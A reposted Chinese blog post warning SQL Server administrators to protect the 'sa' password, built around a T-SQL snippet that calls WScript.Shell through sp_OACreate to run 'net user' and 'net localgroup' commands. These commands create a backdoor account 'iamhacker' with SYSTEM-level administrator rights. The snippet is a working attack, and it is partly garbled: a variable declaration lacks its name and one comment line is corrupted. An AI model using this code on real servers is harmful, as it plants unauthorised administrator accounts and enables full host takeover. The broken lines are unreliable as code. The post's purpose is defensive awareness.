SQL Server的安全隱患：不要以為黑掉的只是SQL SERVER而已。 (轉)

SQL Server的安全隱患：不要以為黑掉的只是SQL SERVER而已。 (轉)[@more@]

SERVER存在著非常嚴重的隱患。sa的密碼就像Administrator的密碼一樣重要。

假如別人獲得了超級sa的密碼，那麼他/她可以在查詢分析器裡使用下面的SQL語句輕易在(所在的Server)上建立一個超級使用者：

declare @ int
--建立WScript.
EXEC sp_OACreate 'WScript.Shell',@object OUT
--運 user iamer opendoor /add
--新增一個名字為iamhacker,密碼為opendoor的使用者
EXEC sp_OAMethod @object,'Run',NULL,'net user iamhacker opendoor /add'
--把iamhacker新增到Administrators組中
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Administrators iamhacker /add'
--把iamhacker從User組中刪除
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Users iamhacker /del'

我已經嘗試過了。。實在太恐怖了。

上面的語句很短。核心是能夠平臺命令 net 。

其實現方法是SQL SERVER呼叫Automation的強大功能。再配合WSH中的一個WScript.Shell的一個方法：Run。（注意，一般SQL SERVER都是在SYSTEM的下執行的。也就是說，Run所呼叫的也是具有SYSTEM的許可權。）

（相關的實驗是，呼叫一下NOTEPAD,那麼工作管理員下將有使用者為SYSTEM的NOTEPAD。EXE程式存在）

WScript.Shell的隱患其實已經在各個方面很顯著了。想不到現在竟然在Sql Server上也有相關的問題。

所以。大家一定要注意保管好sa的密碼。不要隨便被人黑了哦。。。